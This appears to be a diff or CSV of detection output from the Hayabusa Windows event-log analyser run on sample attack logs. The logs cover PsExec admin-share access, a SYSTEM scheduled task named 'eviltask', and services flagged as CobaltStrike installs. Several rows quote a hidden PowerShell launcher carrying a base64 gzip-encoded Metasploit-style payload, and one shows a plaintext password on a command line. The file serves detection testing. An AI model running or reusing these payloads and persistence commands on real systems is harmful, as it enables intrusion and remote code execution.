+2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: cmd.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: cmd.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.529 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.531 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""cmd.exe"" -u demo\admmig -p Admin1235 -accepteula | Path: C:\Windows\cmd.exe | PID: 0x15d4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:41:03.008 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x590 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:42:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1050 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:43:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf90 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 22:30:00.569 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\schtasks.exe"" /create /sc minute /mo 1 /tn eviltask /tr C:\tools\shell.cmd /ru SYSTEM | Path: C:\Windows\System32\schtasks.exe | PID: 0x15b4 | User: admmig | LID: 0x6fc89e",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx
+2021-04-21 22:30:03.012 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x2ac | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx
+2021-04-21 23:56:41.780 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:41.786 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID5145-remote service creation over SMB.evtx
+2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5145-remote shell execution via SMB admin share.evtx
+2021-04-21 23:56:41.897 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx
+2021-04-21 23:56:43.246 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1510 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-21 23:56:43.246 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1510 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:43.280 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1140 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-21 23:56:43.280 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: 